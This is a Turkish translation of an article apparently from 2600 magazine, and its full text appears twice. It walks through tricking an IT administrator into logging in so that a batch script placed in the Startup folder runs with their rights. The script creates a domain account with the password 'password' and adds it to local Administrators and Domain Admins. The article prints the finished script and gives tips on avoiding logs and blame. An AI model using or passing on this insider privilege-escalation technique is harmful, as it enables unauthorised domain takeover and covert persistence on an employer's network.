Aşağıdaki doküman 2600 dergisi Winter 2000-2001 sayısından alınmıştır.
Yazar: Hi_RISC
Kısa bir süre önce kabinimde (cubicle) oturmuş birşeyler yapıyormuş gibi görünmek için öylesine klavyemde tuşlara basıyordum. Birden makinamdaki tarih ve saat bilgilerinin yanlış olduğunu farkettim. Bir kaç &l039;Access Denied&l039; mesajından sonra düzeltmekten vazgeçtim fakat biraz rahatsız hissettim. &l039;Benim birşeyleri bozmadan makinamın saatini düzeltemeyecek kadar yetersiz birimi olduğumu düşünüyorlar?&l039;. Bu düşünce herşeyi başlattı.
Yaptığım iş büyük bir OEM üretici firma için Helpdesk telefon desteği idi. NT ve 95/98`in işleyisi hakkındaki bilgilerimle kendimi hem zeki hemde bilgili bulurum. MCSE sınavına hazırlandığım için her durum için referans bilgileri mevcuttu. Biraz okuduktan sonra, kendimi kendi makinamın yerel admin`i yapmak istedim. Bu şekilde istediğim zaman tarihi ve saati düzeltebilirdim. Son günlerde pek kullanılmasada tüm NT yönetimi komut satırından yapılabilir. Kendinizi yerel yöneticiler grubuna ekleyecek bir script yazmak çok kolay fakat bu script doğru yetkilerle nasıl çalışacak? Göründüğünden daha kolay, önce script`e bakalım:
Echo off
Net localgroup administrators %username% /add
Bu script`in çalışması ve düzgün yetkiyle çalısması metodu oldukça basit. Tüm yaptığım firmadaki IT professional`la (tek admin yetkisi olması gereken kişi) kontak kurup tarih/saat problemimden bahsetmek oldu. Hemen geleceğini söyledi ve bende hemen script`i login.bat diye isimlendirip çalışması için c:winntprofilesall usersstart menuprogramsstartup dizinine koydum. Login olurken onun dikkatini çektim ve o da script`in kısa sürede çalıştığını farkedemedi. İşe yaramıştı. Artık sürücüler kurup kaldırabiliyor, tarihi değiştirebiliyor ve hatta masaüstü ayarlarını değiştirebiliyordum.
Yakalanmamak için siz olduğunuzu ortaya çıkarmayacak alakasız bir hesap açmanızı öneririm. Birileri &l039;Domain Admins&l039; grubundaki hesapları incelerse ve orda sizin kullanıcı isminizi görürse bu hiçde iyi olmaz, fakat &l039;Guest&l039; kullanıcı hesabı yada başka dikkat çekmeyen bir hesap bulurlarsa kimi suçlaycaklar? kendilerini tabiki. Script ilk olarak bir kullanıcı eklemeli (eğer Guest hesabını kullanacaksanız buna gerek yok).
Net user %username% password /active /domain /add
Bu DC`de (domain controller) şifresi &l039;password&l039; olan ve aktif olan (disabled değil) bir kullanıcı yaratacaktır.
Son olarak bu kullanıcı hesabını &l039;Guests&l039; grubundan çıkarıp &l039;Domain Admins&l039; grubuna ekleyelim.
Net group &l039;Domain Admins&l039; %username% /add /domain
Net group &l039;Guests&l039; %username% /delete /domain
Bu şekilde kimseye ait olmayan bir kullanıcı hesabı yarattık, onu misafir grubundan çıkarıp Domain yöneticileri grubuna ekledik. 5 satırlık bir script için hiçde fena değil. İşte script`imizin bitmiş hali:
Echo off
Net user %username% password /active /domain /add
Net localgroup administrators %username% /add
Net group &l039;Domain Admins&l039; %username% /add /domain
Net group &l039;Guests&l039; %username% /delete /domain
Bu kısa zamanda farkedilemeyecek olan bir &l039;ani saldırı&l039; örneği. Bir NT admin`i olarak, aynı kullanıcı ismini iki defa kullanmamanızı ve kendi PC`nizi kullanmamanızı öneririm. Bütün bu işlemler loglanır ve arkada iz bırakmak istemezsiniz
Yazar: Hi_RISC
Kısa bir süre önce kabinimde (cubicle) oturmuş birşeyler yapıyormuş gibi görünmek için öylesine klavyemde tuşlara basıyordum. Birden makinamdaki tarih ve saat bilgilerinin yanlış olduğunu farkettim. Bir kaç &l039;Access Denied&l039; mesajından sonra düzeltmekten vazgeçtim fakat biraz rahatsız hissettim. &l039;Benim birşeyleri bozmadan makinamın saatini düzeltemeyecek kadar yetersiz birimi olduğumu düşünüyorlar?&l039;. Bu düşünce herşeyi başlattı.
Yaptığım iş büyük bir OEM üretici firma için Helpdesk telefon desteği idi. NT ve 95/98`in işleyisi hakkındaki bilgilerimle kendimi hem zeki hemde bilgili bulurum. MCSE sınavına hazırlandığım için her durum için referans bilgileri mevcuttu. Biraz okuduktan sonra, kendimi kendi makinamın yerel admin`i yapmak istedim. Bu şekilde istediğim zaman tarihi ve saati düzeltebilirdim. Son günlerde pek kullanılmasada tüm NT yönetimi komut satırından yapılabilir. Kendinizi yerel yöneticiler grubuna ekleyecek bir script yazmak çok kolay fakat bu script doğru yetkilerle nasıl çalışacak? Göründüğünden daha kolay, önce script`e bakalım:
Echo off
Net localgroup administrators %username% /add
Bu script`in çalışması ve düzgün yetkiyle çalısması metodu oldukça basit. Tüm yaptığım firmadaki IT professional`la (tek admin yetkisi olması gereken kişi) kontak kurup tarih/saat problemimden bahsetmek oldu. Hemen geleceğini söyledi ve bende hemen script`i login.bat diye isimlendirip çalışması için c:winntprofilesall usersstart menuprogramsstartup dizinine koydum. Login olurken onun dikkatini çektim ve o da script`in kısa sürede çalıştığını farkedemedi. İşe yaramıştı. Artık sürücüler kurup kaldırabiliyor, tarihi değiştirebiliyor ve hatta masaüstü ayarlarını değiştirebiliyordum.
Yakalanmamak için siz olduğunuzu ortaya çıkarmayacak alakasız bir hesap açmanızı öneririm. Birileri &l039;Domain Admins&l039; grubundaki hesapları incelerse ve orda sizin kullanıcı isminizi görürse bu hiçde iyi olmaz, fakat &l039;Guest&l039; kullanıcı hesabı yada başka dikkat çekmeyen bir hesap bulurlarsa kimi suçlaycaklar? kendilerini tabiki. Script ilk olarak bir kullanıcı eklemeli (eğer Guest hesabını kullanacaksanız buna gerek yok).
Net user %username% password /active /domain /add
Bu DC`de (domain controller) şifresi &l039;password&l039; olan ve aktif olan (disabled değil) bir kullanıcı yaratacaktır.
Son olarak bu kullanıcı hesabını &l039;Guests&l039; grubundan çıkarıp &l039;Domain Admins&l039; grubuna ekleyelim.
Net group &l039;Domain Admins&l039; %username% /add /domain
Net group &l039;Guests&l039; %username% /delete /domain
Bu şekilde kimseye ait olmayan bir kullanıcı hesabı yarattık, onu misafir grubundan çıkarıp Domain yöneticileri grubuna ekledik. 5 satırlık bir script için hiçde fena değil. İşte script`imizin bitmiş hali:
Echo off
Net user %username% password /active /domain /add
Net localgroup administrators %username% /add
Net group &l039;Domain Admins&l039; %username% /add /domain
Net group &l039;Guests&l039; %username% /delete /domain
Bu kısa zamanda farkedilemeyecek olan bir &l039;ani saldırı&l039; örneği. Bir NT admin`i olarak, aynı kullanıcı ismini iki defa kullanmamanızı ve kendi PC`nizi kullanmamanızı öneririm. Bütün bu işlemler loglanır ve arkada iz bırakmak istemezsiniz
